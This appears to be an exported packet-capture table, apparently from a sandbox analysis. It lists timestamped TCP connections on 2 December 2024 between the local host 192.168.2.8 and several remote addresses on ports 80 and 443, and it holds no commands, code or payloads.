                                                                                                                                                                                                        Dec 2, 2024 07:37:59.429588079 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.429621935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.430454016 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:59.430522919 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.988097906 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.988121033 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.988513947 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.988977909 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:10.988990068 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:11.759282112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.360454082 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.360502005 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.360639095 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.361865997 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.361877918 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.885571003 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.886259079 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.886272907 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.887341976 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.887403965 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.888463974 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.888536930 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.928468943 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.928492069 CET44349732172.217.21.36192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:12.973978043 CET49732443192.168.2.8172.217.21.36
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.791826963 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.791919947 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.793881893 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.793904066 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.794111013 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.842008114 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:13.887331009 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315340042 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315406084 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315455914 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315576077 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315599918 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315612078 CET49733443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.315618992 CET4434973323.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.355262041 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.355300903 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.355384111 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.355736017 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.355746984 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.838563919 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.838608027 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.838668108 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.839005947 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.839016914 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.910377026 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.910422087 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.910480022 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.911012888 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:14.911027908 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.779772997 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.779845953 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.782151937 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.782160044 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.782465935 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.783752918 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:15.831329107 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.305583954 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.305655003 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.306063890 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.307802916 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.307821989 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.307833910 CET49736443192.168.2.823.218.208.109
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.307842016 CET4434973623.218.208.109192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.558964014 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.560276985 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.560287952 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.561495066 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.561569929 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.563349009 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.563422918 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.563956976 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.563965082 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.614814997 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.630081892 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.636418104 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.636435032 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.637535095 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.637597084 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.639108896 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.639188051 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.639481068 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.639488935 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:16.692739010 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136774063 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136796951 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136806011 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136831999 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136847973 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136862040 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136873960 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136883974 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136894941 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.136921883 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147516966 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147541046 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147552013 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147577047 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147586107 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147594929 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147603035 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147620916 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147672892 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.147672892 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313770056 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313792944 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313839912 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313862085 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313909054 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.313916922 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326236963 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326260090 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326333046 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326343060 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326363087 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.326390982 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.330990076 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.355788946 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.355813980 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.355878115 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.355890036 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.355947018 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.361486912 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.361505032 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.361577034 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.361588955 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.410975933 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.411053896 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.411062956 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.411189079 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.411601067 CET49741443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.411622047 CET4434974113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482455015 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482481003 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482537031 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482563972 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482592106 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.482614040 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513411045 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513432026 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513473034 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513479948 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513509035 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.513550997 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.542818069 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.542839050 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.542895079 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.542901993 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.542946100 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563119888 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563137054 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563198090 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563204050 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.563246012 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.564235926 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.564274073 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.564369917 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.564734936 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.564745903 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.671116114 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.671137094 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.671196938 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.671207905 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.671258926 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.688040972 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.688057899 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.688126087 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.688141108 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.688179016 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.703382969 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.703398943 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.703454018 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.703464031 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.703505039 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716252089 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716269016 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716325998 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716332912 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716361046 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.716386080 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.731678963 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.731695890 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.731770039 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.731775999 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.731832027 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.742681980 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.742716074 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.742750883 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.742800951 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.742854118 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.743331909 CET49740443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.743340969 CET4434974013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.924405098 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.924448967 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.924626112 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.924813032 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:17.924837112 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.345603943 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.346085072 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.346096039 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.347204924 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.347296000 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.348088980 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.348156929 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.348532915 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.348539114 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.356280088 CET49747443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.356307030 CET443497474.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.356424093 CET49747443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.357009888 CET49747443192.168.2.84.245.163.56
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.357021093 CET443497474.245.163.56192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.395772934 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.771158934 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.772974968 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.772989988 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774013996 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774074078 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774595976 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774667978 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774743080 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.774750948 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.817594051 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844896078 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844919920 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844928980 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844959974 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844974041 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844985008 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.844993114 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.845022917 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:19.845052958 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034039021 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034065962 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034115076 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034133911 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034162045 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.034182072 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.041507006 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.084151030 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.088001013 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.088025093 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.088073015 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.088088036 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.088213921 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123429060 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123496056 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123509884 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123528004 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123552084 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123589039 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123969078 CET49743443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.123981953 CET4434974313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274554968 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274578094 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274610996 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274629116 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274640083 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274646044 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274658918 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274708033 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.274724007 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.472290039 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.472312927 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.472390890 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.472404957 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.472470045 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.516660929 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.516684055 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.516738892 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.516755104 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.516840935 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663626909 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663647890 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663712978 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663728952 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663748980 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.663799047 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.694525003 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.694545031 CET4434974613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.694631100 CET49746443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:20.694631100 CET49746443192.168.2.813.107.246.63
